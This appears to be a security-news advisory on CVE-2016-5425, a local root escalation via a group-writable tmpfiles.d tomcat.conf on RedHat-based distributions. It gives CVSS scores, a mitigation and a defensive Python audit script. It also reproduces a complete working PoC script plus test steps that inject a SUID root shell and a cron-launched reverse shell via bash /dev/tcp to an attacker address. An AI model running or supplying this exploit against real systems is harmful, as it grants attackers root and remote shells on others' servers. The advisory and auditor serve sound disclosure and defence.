myhack58 | Anonymous (佚名) | MYHACK58:62201680097
History: Oct 12, 2016 - 12:00 a.m.

Vulnerability alert: Apache Tomcat local privilege escalation vulnerability in RedHat-based distributions - vulnerability alert - Black Bar Security Network (myhack58)

2016-10-12 00:00:00
Anonymous (佚名)
www.myhack58.com

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

47.4%

Description
Tomcat has been making headlines lately: less than a month on, another Tomcat vulnerability has surfaced. On 11 October 2016 a Tomcat local privilege escalation vulnerability, CVE-2016-5425, was disclosed online. It mainly affects the Apache Tomcat packages of RedHat-based distributions, including CentOS, RedHat, Oracle Linux and Fedora. The root cause is that the ordinary tomcat user has write permission on the configuration file /usr/lib/tmpfiles.d/tomcat.conf, so a member of the tomcat group, or a WebShell running with ordinary tomcat privileges, can escalate to root.
Vulnerability description
After the Tomcat package is installed on a RedHat-based release, the tomcat user (through its group) has write permission on the tomcat.conf file, as shown below:
[root@localhost ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf
-rw-rw-r--. 1 root tomcat 43 May 12 2015 /usr/lib/tmpfiles.d/tomcat.conf
The configuration files in the tmpfiles.d directory are used by systemd-tmpfiles to manage temporary files. An attacker can very easily inject a malicious payload into tomcat.conf, for example a reverse shell or the creation of a file with the SUID bit set; when /usr/bin/systemd-tmpfiles runs, the injected payload takes effect.
On RedHat distributions, systemd-tmpfiles is run at boot by the systemd-tmpfiles-setup.service unit, as follows:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup.service | grep ExecStart
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depending on the system, systemd-tmpfiles may also be triggered by other services, cron jobs, startup scripts and other means. Another point worth noting is that systemd-tmpfiles does not stop on a syntax error in a configuration file, so an attacker can easily inject a malicious payload into /usr/lib/tmpfiles.d/tomcat.conf.
From the PoC below we can see that what gets injected into tomcat.conf is a reverse shell plus a new shell binary with the SUID bit set; the meaning of the C, z and F entry types can be looked up with man 5 tmpfiles.d.
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
POC
-----------[ tomcat-RH-root.sh ]---------

#!/bin/bash
#
# Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit
#
# CVE-2016-5425
#
# Full advisory at:
# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
#
# Discovered and coded by:
# Dawid Golunski
# http://legalhackers.com
#
# Tested on RedHat, CentOS, OracleLinux, Fedora systems.
#
# For testing purposes only.

ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9090

echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *"
echo -e "Discovered by Dawid Golunski\n"

echo "[+] Checking vulnerability"
ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat'
if [ $? -ne 0 ]; then
    echo "Not vulnerable or the tomcat installed under a different user than 'tomcat'"
    exit 1
fi
echo -e "\n[+] Your system is vulnerable!"

echo -e "\n[+] Appending data to the /usr/lib/tmpfiles.d/tomcat.conf..."
cat <<eof >>/usr/lib/tmpfiles.d/tomcat.conf
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
eof

echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:"
cat /usr/lib/tmpfiles.d/tomcat.conf
echo -e "\n[+] Payload injected! Wait for your root shell...\n"
echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n"
--------------[ eof]--------------------
Local test:

  1. First determine the local Linux distribution and Tomcat version.
    ![](/Article/UploadPic/2016-10/20161012153043542.png?www.myhack58.com)
  2. Switch to tomcat group privileges and append the malicious payload to the /usr/lib/tmpfiles.d/tomcat.conf file:
    ![](/Article/UploadPic/2016-10/20161012153044926.png?www.myhack58.com)
    cat <<eof >>/usr/lib/tmpfiles.d/tomcat.conf
    F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/192.168.1.3/9999 0<&1 2>&1 & \n\n"
    eof
  3. As root, manually trigger /usr/bin/systemd-tmpfiles --create [this step is rather unsatisfying: it relies on the system having another service, cron job or startup script that triggers systemd-tmpfiles. If there is one, so much the better; if not, the vulnerability is of limited practical use, because systemd-tmpfiles still has to be triggered somehow.]
    [root@localhost Desktop]# /usr/bin/systemd-tmpfiles --create
  4. Receive the reverse root shell.

Vulnerability
An attacker who holds tomcat privileges can escalate locally to root by rewriting the configuration file. Combined with a suitable web application vulnerability, a remote attacker can also exploit it remotely.

Affected versions
CentOS
Fedora
Oracle Linux
RedHat
Red Hat official details: https://access.redhat.com/security/cve/CVE-2016-5425

Solutions
Temporary mitigation
Adjust the permissions of /usr/lib/tmpfiles.d/tomcat.conf to remove the tomcat group's write permission:
chmod 644 /usr/lib/tmpfiles.d/tomcat.conf
Update to the latest Tomcat package
The Red Hat security team fixed the affected upstream Tomcat packages promptly; update directly to the Tomcat package provided by the distribution.
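As an added defender-side check (this is example code written for this page, not code from the advisory, from Red Hat, or from the PoC author), the following Python script audits a host for the two conditions the advisory hinges on: a tmpfiles.d configuration file that a non-root owner, group or world can write to (tomcat.conf was root:tomcat 0664 on affected packages), and entries that would create setuid/setgid files or drop files into cron directories, which is the shape of the payload described above. It generalises beyond tomcat.conf to every .conf file in the standard tmpfiles.d directories. The directory lists, the dangerous-entry rules and the sample tomcat.conf text embedded in it are assumptions constructed for the example; the sample keeps only the entry shapes from the page, with the cron command replaced by a placeholder.

```python
"""Audit systemd tmpfiles.d config for the weakness behind CVE-2016-5425.
Added example, not code from the advisory, Red Hat or the PoC author: flags
(1) config files writable by a non-root owner/group/world and (2) entries
that create setuid/setgid files or drop files into cron directories."""
import os
import stat

# Directories systemd-tmpfiles reads (assumption: standard systemd layout).
TMPFILES_DIRS = ("/etc/tmpfiles.d", "/run/tmpfiles.d", "/usr/lib/tmpfiles.d")
# Places where a dropped file is run by crond with no further trigger needed.
CRON_DIRS = ("/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily",
             "/etc/cron.weekly", "/etc/cron.monthly", "/var/spool/cron")

def perm_findings(path, st_uid, st_mode):
    """Ownership/mode checks, kept free of I/O so they can be unit-tested."""
    findings = []
    if st_uid != 0:
        findings.append(f"{path}: owned by uid {st_uid}, not root")
    if st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable (mode {stat.S_IMODE(st_mode):04o})")
    if st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable (mode {stat.S_IMODE(st_mode):04o})")
    return findings

def parse_tmpfiles_line(line):
    """Split a tmpfiles.d(5) line into (type, path, mode, user, group, age, argument).
    The argument is the rest of the line, so a quoted F argument stays intact;
    comments and blank lines give None; missing trailing fields become '-'."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 6)
    fields += ["-"] * (7 - len(fields))
    return tuple(fields)

def parse_mode(field):
    """Octal mode field; '-' means default; the '~'/':' prefixes are stripped."""
    field = field.lstrip("~:")
    if field in ("", "-"):
        return None
    try:
        return int(field, 8)
    except ValueError:
        return None

def entry_findings(entry, src="<line>"):
    """Flag an entry that would hand out setuid/setgid bits or reach a cron directory."""
    etype, path, mode = entry[0], entry[1], entry[2]
    findings = []
    bits = parse_mode(mode)
    if bits is not None and bits & (stat.S_ISUID | stat.S_ISGID):
        findings.append(f"{src}: '{etype} {path}' sets setuid/setgid bits (mode {mode})")
    if any(path == d or path.startswith(d + "/") for d in CRON_DIRS):
        findings.append(f"{src}: '{etype} {path}' writes into a cron directory")
    return findings

def audit_config_text(text, src="<config>"):
    """Run entry_findings over every line of a config file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_tmpfiles_line(line)
        if entry is not None:
            findings.extend(entry_findings(entry, f"{src}:{lineno}"))
    return findings

def audit_file(path):
    """Permission check plus content check for one .conf file on disk."""
    st = os.stat(path)
    findings = perm_findings(path, st.st_uid, st.st_mode)
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings.extend(audit_config_text(fh.read(), path))
    return findings

def audit_host(dirs=TMPFILES_DIRS):
    """Audit every .conf file in whichever tmpfiles.d directories exist here."""
    findings = []
    for directory in dirs:
        if os.path.isdir(directory):
            for name in sorted(os.listdir(directory)):
                path = os.path.join(directory, name)
                if name.endswith(".conf") and os.path.isfile(path):
                    findings.extend(audit_file(path))
    return findings

# Constructed sample: one shipped-style entry, then the three entry types the
# advisory's payload appends, with the cron command replaced by a placeholder.
SAMPLE_TOMCAT_CONF = """\
d /var/run/tomcat 0770 root tomcat -
# entries a tomcat-group member could append if the file is group-writable
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root PLACEHOLDER_COMMAND"
"""

if __name__ == "__main__":
    for finding in audit_config_text(SAMPLE_TOMCAT_CONF, "sample tomcat.conf"):
        print(finding)
    for finding in audit_host():  # live host; no output means nothing was flagged
        print(finding)
```

Run it as root on the host so every tmpfiles.d file is readable. On a correctly patched system every file there is root-owned with mode 0644 (which is exactly what the chmod 644 mitigation above restores for tomcat.conf) and audit_host() returns nothing; any setuid or cron-directory entry it reports is worth reviewing by hand, because systemd-tmpfiles will act on it silently at the next boot or the next time a service runs it.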
